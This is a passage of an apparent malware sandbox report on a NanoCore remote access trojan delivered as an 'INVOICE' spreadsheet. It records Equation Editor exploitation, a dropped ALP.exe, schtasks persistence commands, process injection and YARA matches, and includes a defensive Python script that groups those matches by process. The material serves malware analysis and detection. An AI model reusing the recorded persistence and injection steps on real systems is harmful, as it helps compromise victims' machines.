        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
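To triage a match list like the one above it helps to fold it by process and to note which hits landed in memory that is both writable and executable. The script below is an added example written for this page, not Joe Sandbox code. It assumes the .sdmp file name is laid out as process index, analysis phase, dump id, base address, page protection and allocation type, and that the protection field holds a Windows PAGE_* value; the report does not state either. The sample input is a few of the report's own match lines with their rule metadata trimmed, one of them kept in the run-together "MEMORYMatched" form that the text export produces.

```python
"""Group the YARA memory-dump matches from a Joe Sandbox report by process.

Added example, not part of the sandbox report. Assumptions (not stated by
the report): the .sdmp name reads
  <process index>.<analysis phase>.<dump id>.<base address>.<page protection>.<allocation type>
and the protection field holds a Windows PAGE_* constant.
"""
import re
from collections import defaultdict

# Windows memory-protection constants (winnt.h).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# Constructed input: match lines copied from the report with the rule
# metadata trimmed; the fourth line keeps the fused "MEMORYMatched" form.
SAMPLE_LINES = """\
Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, author = Florian Roth
Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, author = Florian Roth
Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, author = Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, author = Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, author = Florian Roth
"""

# A memory-dump match: six dot-separated fields before ".sdmp".
DUMP_RE = re.compile(
    r"Source:\s*(?P<dump>[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}"
    r"\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8})\.sdmp,\s*type:\s*MEMORY\s*Matched rule:\s*(?P<rule>\S+)"
)
# A whole-process string match, keyed by image name and PID.
PROC_RE = re.compile(
    r"Source:\s*Process Memory Space:\s*(?P<image>\S+)\s+PID:\s*(?P<pid>\d+),"
    r"\s*type:\s*MEMORYSTR\s*Matched rule:\s*(?P<rule>\S+)"
)


def parse_matches(text):
    """Turn report lines into dicts with process, base, protection and rule."""
    records = []
    for line in text.splitlines():
        m = DUMP_RE.search(line)
        if m:
            proc_idx, _phase, _dump_id, base, prot, _alloc = m.group("dump").split(".")
            records.append({
                "process": f"process index {int(proc_idx, 16)}",
                "base": int(base, 16),
                "protection": int(prot, 16),
                "rule": m.group("rule"),
            })
            continue
        m = PROC_RE.search(line)
        if m:
            records.append({
                "process": f"{m.group('image')} PID {m.group('pid')}",
                "base": None,
                "protection": None,
                "rule": m.group("rule"),
            })
    return records


def summarize(records):
    """Return (rules fired per process, matches that sit in RWX regions)."""
    rules_by_process = defaultdict(set)
    rwx_hits = []
    for r in records:
        rules_by_process[r["process"]].add(r["rule"])
        if r["protection"] is not None and r["protection"] & PAGE_EXECUTE_READWRITE:
            rwx_hits.append((r["process"], r["base"], r["rule"]))
    return dict(rules_by_process), rwx_hits


if __name__ == "__main__":
    by_proc, rwx = summarize(parse_matches(SAMPLE_LINES))
    for proc, rules in sorted(by_proc.items()):
        print(f"{proc}: {', '.join(sorted(rules))}")
    for proc, base, rule in rwx:
        print(f"RWX region at 0x{base:08X} in {proc} matched {rule}")
```

Read this way, the hits at base 0x402000 with protection 0x40 in process indexes 4, 0xE, 0x10 and 0x11 sit in a PAGE_EXECUTE_READWRITE region just above a 0x400000 image base, which is consistent with a payload mapped into memory by hand rather than by the loader and fits the report's "Injects a PE file into a foreign processes" signature; the heap-range hits with protection 0x04 are the same strings in plain read-write data. The HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers key open further down is the Software Restriction Policy lookup every .NET executable performs at start-up and is not evidence of malice on its own.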
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_004330D0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043009C
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00431121
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00431B00
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00433CD8
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00434E09
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00431700
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_004380FA
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043A901
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00438108
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043A910
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_004399D0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043838A
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00438398
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_004313B0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_004304E1
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00438569
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00436D18
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00436D28
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00435DF0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043AE48
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_0043AE38
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00437F08
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 3_2_00437F18
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0025E038
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0025C0B0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_002543A0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0025B498
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_00253788
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0025C16E
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_00254458
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_00727050
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0072D540
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0072EA30
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_00727C68
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0072E158
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_0072E216
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_00727D26
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E0048
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E0C50
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E4CB8
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E43C8
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E4078
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E1527
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 4_2_022E0D1E
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031009C
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_003130D0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00311121
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00311B00
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00313CD8
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00314E09
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00311700
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031A910
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031A901
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00318108
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00319A0D
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00316260
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_003113B0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00318398
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00313C30
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00316D28
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00316D18
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00318569
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00315DF0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00315DEC
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031A630
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031AE38
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_0031AE48
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00317F18
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 10_2_00317F08
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E009C
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E30D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E1121
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E1B00
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E3CD8
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E4E09
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E1700
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E8108
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002EA901
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002EA910
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E99D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E13B0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E8398
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E6D28
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E6D18
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E8569
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E5DF0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002EAE38
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002EAE48
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E7F08
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 11_2_002E7F18
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0025009C
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_002530D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00251121
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00251B00
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00253CD8
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00254E09
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00251700
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0025A901
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00258108
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0025A910
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_002599D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_002513B0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00258398
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_002504E1
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00256D28
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00256D18
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00258569
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00255DF0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0025AE38
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0025AE48
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00257F08
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_00257F18
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 14_2_003F43A0
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 14_2_003F3788
        Source: C:\Users\user\AppData\Roaming\ALP.exe Code function: 14_2_003F4458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 16_2_002143A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 16_2_00213788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 16_2_00214C78
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 16_2_00214458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_003146C9
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_003143A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00313788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00314C78
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 17_2_00314458
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E90000 page execute and read and write
        Source: ALP.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: smtpsvc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: INVOICE = 212888585 .xlsxVirustotal: Detection: 42%
        Source: INVOICE = 212888585 .xlsxReversingLabs: Detection: 50%
        Source: C:\Users\user\AppData\Roaming\ALP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.......................(.P.............P...............g.................................................................(.....
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............................f.......................................................................
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {6D7D75E4-8EFD-44BB-96AC-FEA7E6E0852F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INVOICE = 212888585 .xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR904.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@26/9@18/2
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{9ed8d108-2eb1-4e23-9679-783796e4baff}
        Source: C:\Users\user\AppData\Roaming\ALP.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: ALP.exe.2.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.ALP.exe.910000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.0.ALP.exe.910000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: smtpsvc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\ALP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: INVOICE = 212888585 .xlsxInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: ALP.exe, 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: INVOICE = 212888585 .xlsxInitial sample: OLE indicators vbamacros = False

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: ALP.exe.2.dr, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.2.ALP.exe.910000.1.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: smtpsvc.exe.4.dr, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
